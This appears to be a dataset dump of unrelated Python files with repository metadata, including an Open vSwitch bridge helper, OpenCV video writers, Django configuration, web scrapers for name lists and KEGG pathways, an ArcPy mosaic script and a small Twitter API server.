def reset_bridge(self):
self.run_vsctl(["--", "--if-exists", "del-br", self.br_name])
self.run_vsctl(["add-br", self.br_name])
def add_port(self, port_name):
self.run_vsctl(["--", "--may-exist", "add-port", self.br_name,
port_name])
return self.get_port_ofport(port_name)
def delete_port(self, port_name):
self.run_vsctl(["--", "--if-exists", "del-port", self.br_name,
port_name])
def set_db_attribute(self, table_name, record, column, value):
args = ["set", table_name, record, "%s=%s" % (column, value)]
self.run_vsctl(args)
def clear_db_attribute(self, table_name, record, column):
args = ["clear", table_name, record, column]
self.run_vsctl(args)
def run_ofctl(self, cmd, args):
full_args = ["ovs-ofctl", cmd, self.br_name] + args
try:
return utils.execute(full_args, root_helper=self.root_helper)
except Exception as e:
LOG.error(_("Unable to execute %(cmd)s. Exception: %(exception)s"),
{'cmd': full_args, 'exception': e})
def count_flows(self):
flow_list = self.run_ofctl("dump-flows", []).split("\n")[1:]
return len(flow_list) - 1
def remove_all_flows(self):
self.run_ofctl("del-flows", [])
def get_port_ofport(self, port_name):
return self.db_get_val("Interface", port_name, "ofport")
def get_datapath_id(self):
return self.db_get_val('Bridge',
self.br_name, 'datapath_id').strip('"')
def _build_flow_expr_arr(self, **kwargs):
flow_expr_arr = []
is_delete_expr = kwargs.get('delete', False)
if not is_delete_expr:
prefix = ("hard_timeout=%s,idle_timeout=%s,priority=%s" %
(kwargs.get('hard_timeout', '0'),
kwargs.get('idle_timeout', '0'),
kwargs.get('priority', '1')))
flow_expr_arr.append(prefix)
elif 'priority' in kwargs:
raise Exception(_("Cannot match priority on flow deletion"))
in_port = ('in_port' in kwargs and ",in_port=%s" %
kwargs['in_port'] or '')
dl_type = ('dl_type' in kwargs and ",dl_type=%s" %
kwargs['dl_type'] or '')
dl_vlan = ('dl_vlan' in kwargs and ",dl_vlan=%s" %
kwargs['dl_vlan'] or '')
dl_src = 'dl_src' in kwargs and ",dl_src=%s" % kwargs['dl_src'] or ''
dl_dst = 'dl_dst' in kwargs and ",dl_dst=%s" % kwargs['dl_dst'] or ''
nw_src = 'nw_src' in kwargs and ",nw_src=%s" % kwargs['nw_src'] or ''
nw_dst = 'nw_dst' in kwargs and ",nw_dst=%s" % kwargs['nw_dst'] or ''
tun_id = 'tun_id' in kwargs and ",tun_id=%s" % kwargs['tun_id'] or ''
proto = 'proto' in kwargs and ",%s" % kwargs['proto'] or ''
ip = ('nw_src' in kwargs or 'nw_dst' in kwargs) and ',ip' or ''
match = (in_port + dl_type + dl_vlan + dl_src + dl_dst +
(ip or proto) + nw_src + nw_dst + tun_id)
if match:
match = match[1:] # strip leading comma
flow_expr_arr.append(match)
return flow_expr_arr
def add_flow(self, **kwargs):
if "actions" not in kwargs:
raise Exception(_("Must specify one or more actions"))
if "priority" not in kwargs:
kwargs["priority"] = "0"
flow_expr_arr = self._build_flow_expr_arr(**kwargs)
flow_expr_arr.append("actions=%s" % (kwargs["actions"]))
flow_str = ",".join(flow_expr_arr)
self.run_ofctl("add-flow", [flow_str])
def delete_flows(self, **kwargs):
kwargs['delete'] = True
flow_expr_arr = self._build_flow_expr_arr(**kwargs)
if "actions" in kwargs:
flow_expr_arr.append("actions=%s" % (kwargs["actions"]))
flow_str = ",".join(flow_expr_arr)
self.run_ofctl("del-flows", [flow_str])
def add_tunnel_port(self, port_name, remote_ip):
self.run_vsctl(["add-port", self.br_name, port_name])
self.set_db_attribute("Interface", port_name, "type", "gre")
self.set_db_attribute("Interface", port_name, "options:remote_ip",
remote_ip)
self.set_db_attribute("Interface", port_name, "options:in_key", "flow")
self.set_db_attribute("Interface", port_name, "options:out_key",
"flow")
return self.get_port_ofport(port_name)
def add_patch_port(self, local_name, remote_name):
self.run_vsctl(["add-port", self.br_name, local_name])
self.set_db_attribute("Interface", local_name, "type", "patch")
self.set_db_attribute("Interface", local_name, "options:peer",
remote_name)
return self.get_port_ofport(local_name)
def db_get_map(self, table, record, column):
output = self.run_vsctl(["get", table, record, column])
if output:
str = output.rstrip("\n\r")
return self.db_str_to_map(str)
return {}
def db_get_val(self, table, record, column):
output = self.run_vsctl(["get", table, record, column])
if output:
return output.rstrip("\n\r")
def db_str_to_map(self, full_str):
list = full_str.strip("{}").split(", ")
ret = {}
for e in list:
if e.find("=") == -1:
continue
arr = e.split("=")
ret[arr[0]] = arr[1].strip("\"")
return ret
def get_port_name_list(self):
res = self.run_vsctl(["list-ports", self.br_name])
if res:
return res.strip().split("\n")
return []
def get_port_stats(self, port_name):
return self.db_get_map("Interface", port_name, "statistics")
def get_xapi_iface_id(self, xs_vif_uuid):
args = ["xe", "vif-param-get", "param-name=other-config",
"param-key=nicira-iface-id", "uuid=%s" % xs_vif_uuid]
try:
return utils.execute(args, root_helper=self.root_helper).strip()
except Exception as e:
LOG.error(_("Unable to execute %(cmd)s. Exception: %(exception)s"),
{'cmd': args, 'exception': e})
# returns a VIF object for each VIF port
def get_vif_ports(self):
edge_ports = []
port_names = self.get_port_name_list()
for name in port_names:
external_ids = self.db_get_map("Interface", name, "external_ids")
ofport = self.db_get_val("Interface", name, "ofport")
if "iface-id" in external_ids and "attached-mac" in external_ids:
p = VifPort(name, ofport, external_ids["iface-id"],
external_ids["attached-mac"], self)
edge_ports.append(p)
elif ("xs-vif-uuid" in external_ids and
"attached-mac" in external_ids):
# if this is a xenserver and iface-id is not automatically
# synced to OVS from XAPI, we grab it from XAPI directly
iface_id = self.get_xapi_iface_id(external_ids["xs-vif-uuid"])
p = VifPort(name, ofport, iface_id,
external_ids["attached-mac"], self)
edge_ports.append(p)
return edge_ports
def get_vif_port_set(self):
edge_ports = set()
port_names = self.get_port_name_list()
for name in port_names:
external_ids = self.db_get_map("Interface", name, "external_ids")
if "iface-id" in external_ids and "attached-mac" in external_ids:
edge_ports.add(external_ids['iface-id'])
elif ("xs-vif-uuid" in external_ids and
"attached-mac" in external_ids):
# if this is a xenserver and iface-id is not automatically
# synced to OVS from XAPI, we grab it from XAPI directly
iface_id = self.get_xapi_iface_id(external_ids["xs-vif-uuid"])
edge_ports.add(iface_id)
return edge_ports
def get_vif_port_by_id(self, port_id):
args = ['--', '--columns=external_ids,name,ofport',
'find', 'Interface',
'external_ids:iface-id="%s"' % port_id]
result = self.run_vsctl(args)
if not result:
return
match = self.re_id.search(result)
try:
vif_mac = match.group('vif_mac')
vif_id = match.group('vif_id')
port_name = match.group('port_name')
ofport = int(match.group('ofport'))
return VifPort(port_name, ofport, vif_id, vif_mac, self)
except Exception as e:
LOG.info(_("Unable to parse regex results. Exception: %s"), e)
return
def delete_ports(self, all_ports=False):
if all_ports:
port_names = self.get_port_name_list()
else:
port_names = (port.port_name for port in self.get_vif_ports())
for port_name in port_names:
self.delete_port(port_name)
def get_local_port_mac(self):
"""Retrieve the mac of the bridge's local port."""
address = ip_lib.IPDevice(self.br_name, self.root_helper).link.address
if address:
return address
else:
msg = _('Unable to determine mac address for %s') % self.br_name
raise Exception(msg)
def get_bridge_for_iface(root_helper, iface):
args = ["ovs-vsctl", "--timeout=2", "iface-to-br", iface]
try:
return utils.execute(args, root_helper=root_helper).strip()
except Exception:
LOG.exception(_("Interface %s not found."), iface)
return None
def get_bridges(root_helper):
args = ["ovs-vsctl", "--timeout=2", "list-br"]
try:
return utils.execute(args, root_helper=root_helper).strip().split("\n")
except Exception as e:
LOG.exception(_("Unable to retrieve bridges. Exception: %s"), e)
return []
| [
"[email protected]"
] | |
14e8dbed30332cd7efd4f33f49eb69b34021b918 | f074fe742b1b242c75872e64a1196ba539066609 | /verres/visualization/device.py | ff5a30ac6fa9695ee2123a773b6f203465b4338c | [
"MIT"
] | permissive | csxeba/Verres | 63f31d82b4e12b4da8b5fa5cc930eb874f1aa60d | 04230d22b7791f84d86b9eb2272a6314a27580ed | refs/heads/master | 2023-04-07T02:07:26.863612 | 2021-12-09T20:15:12 | 2021-12-09T20:15:12 | 176,881,974 | 0 | 0 | MIT | 2023-03-18T19:56:38 | 2019-03-21T06:17:58 | Python | UTF-8 | Python | false | false | 3,901 | py | import pathlib
from typing import Union, List
import cv2
class OutputDevice:
def __init__(self, scale: float, fps: int):
self.scale = scale
self.fps = fps
def write(self, frame):
raise NotImplementedError
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
class CV2Screen(OutputDevice):
def __init__(self, window_name="CV2Screen", fps=None, scale=1.):
super().__init__(scale, fps)
self.name = window_name
if self.fps is None:
self.fps = 1000
self.spf = 1000 // fps
self.online = False
def write(self, frame):
if not self.online:
self.online = True
if self.scale != 1:
frame = cv2.resize(frame, (0, 0), fx=self.scale, fy=self.scale, interpolation=cv2.INTER_CUBIC)
cv2.imshow(self.name, frame)
cv2.waitKey(self.spf)
def teardown(self):
if self.online:
cv2.destroyWindow(self.name)
self.online = False
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.teardown()
def __del__(self):
self.teardown()
class CV2VideoWriter(OutputDevice):
def __init__(self, file_name: str, fps: int, scale: float):
super().__init__(scale, fps)
self.file_name = file_name
self.size = None
self.device: Union[cv2.VideoWriter, None] = None
self._in_context = False
def __enter__(self):
self._in_context = True
def __exit__(self, exc_type, exc_val, exc_tb):
if self.device is not None:
self.device.release()
self.device = None
self._in_context = False
def write(self, frame):
if not self._in_context:
raise RuntimeError("Please run in a `with` context!")
if self.device is None:
fourcc = cv2.VideoWriter_fourcc(*"DIVX")
self.device = cv2.VideoWriter(self.file_name, fourcc, float(self.fps), frame.shape[:2][::-1])
if self.scale != 1:
frame = cv2.resize(frame, (0, 0), fx=self.scale, fy=self.scale)
self.device.write(frame)
class OutputDeviceList:
def __init__(self,
output_device_list: List[OutputDevice],
scale: float = None):
self.devices: List[OutputDevice] = output_device_list
self.in_context = False
if scale is not None:
for device in self.devices:
if device.scale not in [scale, 1.]:
raise RuntimeError("Ambiguous definitions for scale!")
device.scale = 1.
self.scale = scale
if not self.devices:
raise RuntimeError("No devices!")
def __enter__(self):
self.in_context = True
for device in self.devices:
device.__enter__()
def __exit__(self, exc_type=None, exc_val=None, exc_tb=None):
for device in self.devices:
device.__exit__(exc_type, exc_val, exc_tb)
def write(self, frame):
if not self.in_context:
raise RuntimeError("Please execute write() in a context manager!")
if self.scale != 1:
frame = cv2.resize(frame, (0, 0), fx=self.scale, fy=self.scale)
for device in self.devices:
device.write(frame)
def output_device_factory(fps: int,
scale: float = 1.,
to_screen: bool = True,
output_file: str = None):
devices = []
if to_screen:
devices.append(CV2Screen(fps=fps, scale=1.))
if output_file:
output_file = pathlib.Path(output_file)
output_file.parent.mkdir(parents=True, exist_ok=True)
devices.append(CV2VideoWriter(str(output_file), fps, scale=1.))
return OutputDeviceList(devices, scale) | [
"[email protected]"
] | |
a9d9fd85d84e026a37f651f024318f42aa8f8e13 | 6b33b2abe0dea14cbb7fec7dfd8f254be1e1f129 | /throttling_api/throttling_api/wsgi.py | f3a4a052a2cd7f74dbf52e439730fdbe7906f165 | [] | no_license | Ashish8135/Django_Rest_Api | bd507f768f04b16ded72097923d7ec460457525c | 95b79e065cc5366b779cd583e32e3081fb67e439 | refs/heads/master | 2023-03-25T21:33:04.924193 | 2021-03-20T19:25:56 | 2021-03-20T19:25:56 | 330,134,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for throttling_api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'throttling_api.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
8f55207db1ebb8dfdf3fd81e3e016c64a325d512 | 7a3bbe10dc7a797234ba707c97a187b30f3f4408 | /name-generator/name_scraper.py | 66359e87a4416d3c36a005a8607b72b7fe5f44b4 | [] | no_license | maknetaRo/python-100 | efbdf8ba2e4f62d3fd96d99f98adc509124c6974 | bc841997a6354810dcac1f09adaba04c3b45e166 | refs/heads/master | 2023-03-18T17:45:07.524711 | 2021-03-07T22:24:49 | 2021-03-07T22:24:49 | 297,062,451 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 909 | py | import requests
from bs4 import BeautifulSoup
import webbrowser
def get_data(url, file_name):
page = requests.get(url)
page.raise_for_status()
soup = BeautifulSoup(page.text, "html.parser")
tbody = soup.find_all(id="myTable")
f = open(file_name, "w+")
records = []
for elem in tbody:
rows = elem.find_all("tr")
for row in rows[1:301]:
column = row.find("td")
column_text = column.text[0] + column.text[1:].lower()
records.append(column_text)
for record in records:
f.write(record + "\n")
url = "https://namecensus.com/data/1000.html"
file_name = "last_names.txt"
get_data(url, file_name)
url = "https://namecensus.com/male_names.htm"
file_name = "male_first_names.txt"
get_data(url, file_name)
url = "https://namecensus.com/female_names.htm"
file_name = "female_first_names.txt"
get_data(url, file_name)
| [
"[email protected]"
] | |
5fe3a068ffe4258d1eea9ff261f3df77e303504c | 07131e91dcf2529e9c7058f8a8f239d419c8f7e0 | /154.find-minimum-in-rotated-sorted-array-ii.py | 8e39152ce5a56fc47d50bc670bb7a5999739dbab | [] | no_license | Code-Wen/LeetCode_Notes | 5194c5c5306cb9f4a0fac85e06fefe6c02d65d44 | 791fc1b43beef89d668788de6d12f5c643431b8f | refs/heads/master | 2021-07-04T14:41:00.830723 | 2020-09-27T16:31:22 | 2020-09-27T16:31:22 | 178,456,323 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,230 | py | #
# @lc app=leetcode id=154 lang=python3
#
# [154] Find Minimum in Rotated Sorted Array II
#
# https://leetcode.com/problems/find-minimum-in-rotated-sorted-array-ii/description/
#
# algorithms
# Hard (41.60%)
# Likes: 1168
# Dislikes: 245
# Total Accepted: 212.8K
# Total Submissions: 511K
# Testcase Example: '[1,3,5]'
#
# Suppose an array sorted in ascending order is rotated at some pivot unknown
# to you beforehand.
#
# (i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]).
#
# Find the minimum element.
#
# The array may contain duplicates.
#
# Example 1:
#
#
# Input: [1,3,5]
# Output: 1
#
# Example 2:
#
#
# Input: [2,2,2,0,1]
# Output: 0
#
# Note:
#
#
# This is a follow up problem to Find Minimum in Rotated Sorted Array.
# Would allow duplicates affect the run-time complexity? How and why?
#
#
#
# @lc code=start
class Solution:
def findMin(self, nums: List[int]) -> int:
lo, hi = 0, len(nums)-1
while lo < hi:
mid = lo + (hi-lo)//2
if nums[mid] < nums[hi]:
hi = mid
elif nums[mid] > nums[hi]:
lo = mid + 1
else:
hi -= 1
return nums[lo]
# @lc code=end
| [
"[email protected]"
] | |
ce867601d1809bfc0d961a05aaa09e9f2f114587 | d2eb4d79ebd7518099dc0e186ec5e73b1b7fb6e8 | /Humsci/dnld2/test.py | 8b44109ffd91f9da7f3bd246f1bb780e97d797e4 | [] | no_license | lylax47/Homework-and-Stuffs | e59cff91873f5eeee12087036a0d667f55f61d39 | eb738572f9894277d1bfc646793f9d98a92cfe81 | refs/heads/master | 2021-01-18T23:43:15.846000 | 2016-06-22T11:50:02 | 2016-06-22T11:50:02 | 48,043,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | # with open('event_info.csv', 'r', encoding = 'utf-8') as cv:
# info = cv.read()
import pandas
df = pandas.read_csv("event_info.csv", sep = '\t') | [
"[email protected]"
] | |
c62dc06c7d081e5e733f4a1cc598e0ffce8ba919 | dc0d911ab71eaa2e888663ff9195009851aad81d | /creating_table.py | 22a52581b7db7f4f9f9223d08248ecd4d12ba6bf | [] | no_license | anyklaude/Translator | 914c441ee6783bd7fa8fbe126ceeb7eaf4f51693 | 5b2d9bb239e781707ad6a97d2b06d16f6978de90 | refs/heads/master | 2021-06-15T05:15:53.305411 | 2021-04-12T10:59:05 | 2021-04-12T10:59:05 | 183,452,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | def create_table(cur):
cur.execute('DROP TABLE IF EXISTS TypingExchange')
cur.execute('''
CREATE TABLE TypingExchange (
code varchar(255),
natural_language varchar(255)
);''')
def insert_codes(cur):
dictionary = {
'be': 'Belarusian', 'bg': 'Bulgarian',
'hu': 'Hungarian', 'vi': 'Vietnamese',
'nl': 'Dutch', 'el': 'Greek',
'da': 'Danish', 'ga': 'Irish',
'it': 'Italian', 'is': 'Icelandic',
'es': 'Spanish', 'kk': 'Kazakh',
'ca': 'Catalan', 'zh': 'Chinese',
'ko': 'Korean', 'lv': 'Latvian',
'lt': 'Lithuanian', 'de': 'German',
'no': 'Norwegian', 'pl': 'Polish',
'pt': 'Portuguese', 'ro': 'Romanian',
'ru': 'Russian', 'sr': 'Serbian',
'sk': 'Slovakian', 'sl': 'Slovenian',
'th': 'Thai', 'tr': 'Turkish',
'uk': 'Ukrainian', 'fi': 'Finnish',
'fr': 'French', 'hr': 'Croatian',
'cs': 'Czech', 'sv': 'Swedish',
'gd': 'Scottish', 'et': 'Estonian',
'ja': 'Japanese'
}
for key in dictionary:
cur.execute('''INSERT INTO TypingExchange (code, natural_language)
VALUES ('{}', '{}');'''.format(key, dictionary[key]))
| [
"[email protected]"
] | |
fca8b399c76165f898e36b82275bf37b7c23e59a | 6c9ee703b142f9b9be64b9df0e3cf1f2ce09e0c2 | /ShopCart/myapp/migrations/0006_auto_20171125_0850.py | 1c6eaca8abd52852a0abb3c65858054ab1fdb4b3 | [] | no_license | ddchris/Shopping_cart | 4e7b8d68bba10b10a51351469a63e95131fcffaf | 2a5f9481c4b31d9b8a686bea8a33ba45d5155970 | refs/heads/master | 2021-09-06T18:07:35.652692 | 2018-02-09T12:43:50 | 2018-02-09T12:43:50 | 110,970,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,862 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-25 00:50
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('myapp', '0005_auto_20171115_2056'),
]
operations = [
migrations.RenameField(
model_name='productmodel',
old_name='pdesc',
new_name='p_desc',
),
migrations.RenameField(
model_name='productmodel',
old_name='pimgs',
new_name='p_imgs',
),
migrations.RenameField(
model_name='productmodel',
old_name='pname',
new_name='p_name',
),
migrations.RenameField(
model_name='productmodel',
old_name='pnewproduct',
new_name='p_newproduct',
),
migrations.RenameField(
model_name='productmodel',
old_name='ponsale',
new_name='p_onsale',
),
migrations.RenameField(
model_name='productmodel',
old_name='pprice',
new_name='p_price',
),
migrations.RenameField(
model_name='usermodel',
old_name='uname',
new_name='user_account',
),
migrations.RenameField(
model_name='usermodel',
old_name='uemail',
new_name='user_email',
),
migrations.RenameField(
model_name='usermodel',
old_name='ugender',
new_name='user_gender',
),
migrations.RenameField(
model_name='usermodel',
old_name='upassword',
new_name='user_password',
),
migrations.RemoveField(
model_name='usermodel',
name='ubirthday',
),
]
| [
"[email protected]"
] | |
dab9bab2e244eadf855a2a8158c1e89f8544dabb | d22fd24fdfe6f2cf3663ad52eecc3cdf42fe30a3 | /test_rank_DUNE17-cold.py | ccb81832ac9000cba0d4dc2aa1861d2d033d28dd | [] | no_license | dladams/duneadc | 0ccb841013e93bb0ca5f1107b3836f55fc765200 | 76ea180e47874b96512697c141f653d2813d78c4 | refs/heads/master | 2020-05-23T09:13:02.960754 | 2018-08-08T13:54:05 | 2018-08-08T13:54:05 | 80,441,704 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 947 | py | # test_rank_DUNE17-cold.py
# David Adams
# July 2017
#
# Test python output emitted by filldbd17c.C.
from rank_DUNE17_cold import effdst
from rank_DUNE17_cold import effrank
import dune17
nerr = 0
def testerror(msg):
global nerr
print "Test failed: " + msg
nerr = nerr + 1
def testequal(lhs, rhs, msg):
if lhs != rhs:
testerror(msg)
print " " + str(lhs) + " != " + str(rhs)
print "Dataset: " + effdst
testequal(effdst, "DUNE17-cold", "Dataset name")
#testequal(effdst, "badDUNE17-cold", "Dataset name 2")
dune17.setDs0710()
chips = dune17.dune17cChips()
testequal(len(chips), len(effrank), "chips and rank sizes");
for chip in chips:
if chip not in effrank:
testerror("Chip " + str(chip) + " is not in effrank.")
for chip in effrank:
if chip not in chips:
testerror("Ranked chip " + str(chip) + " is not in chip list.")
print
if nerr:
print "Failure count: " + str(nerr)
else:
print "All tests passed."
| [
"[email protected]"
] | |
7506ef5edf4d9d8584415ecace70955bc8940376 | 3ac423b72ceefc32a54b3348a84c559289e2ef0b | /mosaic_assemble.py | 75e7db455d5bb0afcaa8eb680595c52fb1e6b9c9 | [] | no_license | feomike/block_mosaic_overlay | 2524ee88acce57703070f2ec90caeeeb209ba7c1 | 2de33e5f18cc69c26974fd621aae0dd0a37338e2 | refs/heads/master | 2021-01-01T20:06:37.031735 | 2013-11-06T19:39:00 | 2013-11-06T19:39:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # ---------------------------------------------------------------------------
# mosaic_assemble.py
# Created on: March 8, 2013
# Created by: Michael Byrne
# Federal Communications Commission
# assembles the mosaic data into one dataset
# ---------------------------------------------------------------------------
# Import system modules
import arcpy
from arcpy import env
import sys, string, os, math
#write out global variables
thePGDB = "C:/Users/michael.byrne/mosaic/processing.gdb" #processing file geodatabase
arcpy.env.workspace = thePGDB
theLocation = "K:/Projects/Broadband Data/SWAT/American Roamer/2013 Jan/Carriers/"
#theLocation = "C:/Users/michael.byrne/mosaic/Carriers/test/"
theSpatialRef = "C:/Users/michael.byrne/mosaic/mosaic.prj"
CleanFirst = "yes"
if CleanFirst == "yes":
#clean files first
myFCs = ["mosaic_all"]
for myFC in myFCs:
if arcpy.Exists(myFC):
arcpy.Delete_management(myFC)
#create a new blank mosaic dataset
arcpy.CreateFeatureclass_management(thePGDB, "mosaic_all", "POLYGON", thePGDB + "/mosaic_template", "", "", theSpatialRef)
##write out functions
##function to assemble the right directories of delivered files
def mosaic_files():
#clean files first
myFCs = ["mydata", "mydata_dis"]
for myFC in myFCs:
if arcpy.Exists(myFC):
arcpy.Delete_management(myFC)
# get the list of the shape files in that directory
for dirname, dirnames, filenames in os.walk(theLocation):
for filename in filenames:
#print os.path.join(dirname, filename)
#arcpy.AddMessage(os.path.join(dirname, filename))
#arcpy.AddMessage("the right side is: " + os.path.join(dirname, filename)[-4:])
if os.path.join(dirname, filename)[-4:] == ".shp":
arcpy.AddMessage("thefile is: " + os.path.join(dirname, filename))
#copy in the source shapefile as the featureclass mydata
arcpy.CopyFeatures_management (os.path.join(dirname, filename), thePGDB + "/mydata")
#repair geometry on this
arcpy.RepairGeometry_management(thePGDB + "/mydata")
#create a new mydata featureclass which is a dissolve of the fields in the input shp
arcpy.Dissolve_management("mydata", thePGDB + "/mydata_dis", ["mkg_name", "entity", "protocol"])
#append the mydata featureclass to mosaic_all featureclass
arcpy.Append_management (["mydata_dis"], "mosaic_all") #, {schema_type}, {field_mapping}, {subtype})
myFCs = ["mydata", "mydata_dis"]
for myFC in myFCs:
if arcpy.Exists(myFC):
arcpy.Delete_management(myFC)
return()
#****************************************************************************
##################Main Code below
#****************************************************************************
try:
if arcpy.Exists(thePGDB + "/mosaic_all"):
mosaic_files()
#open a file to write when it finished
#outFile = "C:/users/michael.byrne/706/wireless_overlay_" + theST + ".txt"
#myFile = open(outFile, 'w')
#myFile.write(theST + ": finished\n")
#myFile.close()
else:
arcpy.AddMessage("output feature class doesn't exist")
del theLocation, theSpatialRef
except:
arcpy.AddMessage("Something bad happened")
| [
"[email protected]"
] | |
9d831422fe776b3f64d80a8a5e86d5f6f127931b | 874ff7c027534c0c074285ade4a08b138e7480f7 | /scripts/genomejp/get_maps.py | 6100190fa6c71808bb76dfa684c57c2229791bd2 | [] | no_license | hurwitzlab/iPlant-Bonnie | 1282eba9d034fd0d064c58230f6abc22c3be2ab8 | 52ae2af3a494f6fa15eec8dd25fab9bfaccc2acd | refs/heads/master | 2021-01-19T17:17:51.479828 | 2013-12-15T21:21:21 | 2013-12-15T21:21:21 | 9,780,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,971 | py | #!/usr/bin/env python
# get_maps.py
from bs4 import BeautifulSoup
import requests
import re
def rest_get(url):
r = requests.get(url)
results = r.text
re.compile(r'DBLINKS.+///', re.DOTALL)
filtered_text = re.sub(r'DBLINKS.+?///', '', results, flags=re.DOTALL)
return filtered_text
BASE_URL = 'http://www.genome.jp'
GENE_URL = BASE_URL + '/dbget-bin/get_linkdb?-t+8+path:map'
REST_URL = 'http://rest.kegg.jp/get/'
ENZYME_URL = BASE_URL + '/dbget-bin/get_linkdb?-t+enzyme+path:map'
KEGG_MAPS = 'test_maps'
OUTPUT = 'output/'
maps = open(KEGG_MAPS, 'r')
with open(KEGG_MAPS, 'r') as f:
for line in f.readlines():
if line.startswith(' '):
p = re.compile(r' (\d+) (.+)')
m = p.match(line)
map_text = m.group(2)[:-1]
kegg_map = m.group(1)
url = GENE_URL + kegg_map
print 'Requesting ' + url
r = requests.get(url)
soup = BeautifulSoup(r.text)
links = soup.find_all('a')
out = OUTPUT + kegg_map + map_text.replace(' ', '_')
print out
outfile = open(out, 'w')
counter = 0
query = ''
for link in links:
href = link.get('href')
print href
if href.startswith('/dbget-bin'):
counter += 1
query = query + link.text
if counter != 10:
query = query + '+'
if counter == 10:
rest_url = REST_URL + query
print rest_url
outfile.write(rest_get(rest_url))
query = ''
counter = 0
if counter != 0:
query = query[:-1]
rest_url = REST_URL + query
print rest_url
outfile.write(rest_get(rest_url))
outfile.close()
| [
"[email protected]"
] | |
40eb5b330e2142c6e8e1c6ae3693e15a7619dd36 | 8e7c5fec76078d61d14c68fb2aff9886e3e81b0e | /server_code/BasicTwitterAPI.py | affd37417b53fe433f8c54c50c4da0492b2f5385 | [
"MIT"
] | permissive | dfiel/TweetOrYeet | aedd44a5f3f725d5aa28a1a3c581b9974e3dbe0a | 8f92a2bf153d633b9954c221f4c0ade12491b90a | refs/heads/master | 2022-04-06T07:36:02.991169 | 2020-02-23T17:41:26 | 2020-02-23T17:41:26 | 242,412,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | from twitter import Twitter, OAuth
import secrets
import json
import http.server
global session
class JSONHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps(session.statuses.user_timeline(screen_name="TweetOrYeet1")).encode())
if __name__ == '__main__':
session = Twitter(auth=OAuth(secrets.token, secrets.token_secret, secrets.consumer_key, secrets.consumer_secret))
httpd = http.server.HTTPServer(('', 8080), JSONHTTPRequestHandler)
httpd.serve_forever()
| [
"[email protected]"
] | |
fc58394071ed4ea0e75130c06e3b1b5aa9f374f4 | bf0eeff2cdbe62c63578ce510cb112c7b88e5989 | /Galleria/gallery/migrations/0002_post_submitter.py | 15d27e9a1fb3414cffb82b4e0e713c87d6ed65af | [] | no_license | FinerDetails/BitLouvre | da313bbd72f31cf25b6e5f1eaf90ce819a00a61b | 6ffb4ddc088ff1e9900af316b6c5cfe10754f3c7 | refs/heads/master | 2023-08-23T09:19:46.532973 | 2021-10-07T20:31:26 | 2021-10-07T20:31:26 | 410,970,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | # Generated by Django 3.2.7 on 2021-09-30 18:02
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('gallery', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='submitter',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='auth.user'),
preserve_default=False,
),
]
| [
"villegalle@villegalle.tfr3vjnqky3ehg5ptc4pxahyoe.fx.internal.cloudapp.net"
] | villegalle@villegalle.tfr3vjnqky3ehg5ptc4pxahyoe.fx.internal.cloudapp.net |
e321bb43a8f776c68156cf97c5c0f05911953140 | 459a47275f872c2af9af29b755395c38dc1fed2e | /qiskit/validation/jsonschema/__init__.py | 9907fdfdc89df1f21c6f7161807f4eb88461bed1 | [
"Apache-2.0"
] | permissive | uguraba/qiskit-terra | 3370c34d81421ab9045a1309d3c8403686e317c7 | 56ee4ca815dd0165dd62684abd364ae706b4fe10 | refs/heads/master | 2020-05-16T20:59:43.552780 | 2019-04-24T18:18:12 | 2019-04-24T18:18:12 | 183,293,754 | 0 | 0 | Apache-2.0 | 2020-01-17T16:39:34 | 2019-04-24T19:27:13 | Python | UTF-8 | Python | false | false | 344 | py | # -*- coding: utf-8 -*-
# Copyright 2019, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
"""Validation using the .json schemas."""
from .exceptions import SchemaValidationError
from .schema_validation import validate_json_against_schema
| [
"[email protected]"
] | |
51cb61471d7c6c1f20e291e98404201a6f8ba047 | ce5d75e7e77d42899855b631893a23e60449561e | /Problems/Smile for me/main.py | 7f3932d89377eb7fe2722a3e6455d304f91d8d74 | [] | no_license | imkouyo/text-generator | b4af2436c1ca77b6687cd42d1c8e43b5d701388a | 0aed80a2bb066090e3de6e6238b3316ab5a801bc | refs/heads/master | 2023-03-27T08:18:59.236012 | 2021-03-24T03:12:58 | 2021-03-24T03:12:58 | 350,925,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63 | py | import re
# define regex template
template = ':[(o)-][(o)]?'
| [
"[email protected]"
] | |
0189eba08470aa0f68986213a1349946a64b8399 | 70e30ea2dd73bbc9ed52057885535e135160f12c | /src/utils/pyTweetCleaner.py | 2ed7fa4a183c120b1721a339e3584edce4cec5bc | [
"MIT"
